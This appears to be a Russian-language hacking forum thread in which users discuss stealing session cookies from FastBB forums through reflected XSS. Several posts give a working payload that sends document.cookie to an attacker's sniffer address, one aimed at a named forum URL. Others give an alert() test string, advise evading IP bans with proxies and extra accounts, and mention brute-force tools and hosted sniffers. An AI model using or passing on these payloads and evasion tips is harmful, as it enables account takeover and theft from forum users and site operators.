Супер-хакеры, а возможно пассивной Xss выманить не только айпишник но и кукисы. И еще, может кто-нибуть скажет мне, - есть програмка брутфорс для фастББ?
Я далеко не супер-хакер, но отвечу на твой вопрос =) С помощью пассивной хсс куки стырить можно. Та хсс, что ты показывал - это и есть пассивная. Смотри внимательней на запрос... ...+document.cookie Короче то, что мы тебе с goffog сказали - это и тырит куки =) ЗЫ Насчет брута - честно не знаю. Думаю почту побыстрей будет брутить
То есть запрос будет таков "><script>img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie;</script> А вот если я хочу угнать куку с форума www.qwert.borda.ru то запрос мне нужно писать в таблицу вот прямо так www.qwert.borda.ru/index.php/"><script>img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie;</script> если что не правильно поправте
Гм, ты сказал поправить?.. Если бы все было так просто... Почитай хотябы пару статей ачатовских про хсс, а то, я вижу, у тебя и представления нету об этом. Коротко : XSS надо уметь внедрить. Вся суть заключается в том, что вредоносный код внедряется в код страницы, которую запрашивает жертва. Но для этого в фастбб ты должен найти уязвимое место, которое позволило бы это сделать. А вот когда найдешь уже все это дело, то тогда уже и строй запрос к сниферу. Для проверки юзай следующий код : "><script>alert()</script> Оно должно выдать алерт. В простонародии - окошко. =)
Я с фастББ не знаком но думаю там тоже есть предварительный просмотр, тоесть смотришь теме что ниже, малехо изменяешь под себя скрипт, заливаешь куда-то и всовуешь жертве. Но админы быстренько все просекут и дадут БАН по АЙПИ, так что зареги по-больше акков и юзай прокси.
goffog, слух, если не уверен, лучше не писать, а то в заблуждение некотыре входят Кстати на фастбб применяется супербан. И насчет предварительного просмотра - если он есть, то форум уязвим?
Ну если супербан, то даже программка есть для его обхода, а как я понял, предварительный просмотр, если и есть, то можно стырить куки, а про уязвимости форума я ниче не говорил.
Предварительный просмотр - это просто такая функция, котрорую в любой момент можно доработать и добавить фильтрацию символов... Если все переменные перед предварительным просмотром отфильтровались, то вот и облом, а на фастбб 150 тыщ процентов баги такого рода устранили. Там глубоко копать надо...
Почему такая уверенность? ИПБ не такой фуфлыжний форум, что б на нем такая бага была а на фастбб нет... И если на фастбб это работает, то принцип тотже.
Подумай сколько людей ежедневно приходят ломануть фастбб... =) ЗЫ пхпбб круче ипб? Нет? Ну так на нем этой баги нету. А вобще оффтопим мы тут с тобой... Короче если че, в ПМ или асю.
Приветствую. Скорее всего не туда,но раз тематика данного топа подходит по смыслу моего сообщения, не примену воспользоваться сим обстоятельством Обьясните пожалуйста несведущему, до сих пор ли работает он лайн сниффер на ачате, т.к. разногласий на эту тему не мало. С ув. ThreeD
У кого был, работает. Только было так http://antichat.ru/s/[ваш логин]/log.php а стало так http://old.antichat.ru/s/[ваш логин]/log.php. А новый регнуть не даёт. Скорее всего связано с перенесением сайта на old.antichat
Пассивный XSS - жертва должна кликнуть. (Изя, смотри какие помидоры) Активный - достаточно просто загрузить страницу со криптом. (Нихyясе помидоры!) Есть разница? А вобще, что это за фигня? Тут вопрос не уязвимостей форумов, а принципа работы скрипта. Модеры спят?
Снифферы По поводу принципа работы сниффера и http сниффера можно всё узнать здесь, аж три части инфы http://www1.hut.ru/aneksniff/ Там же и сам сниффер выложен.
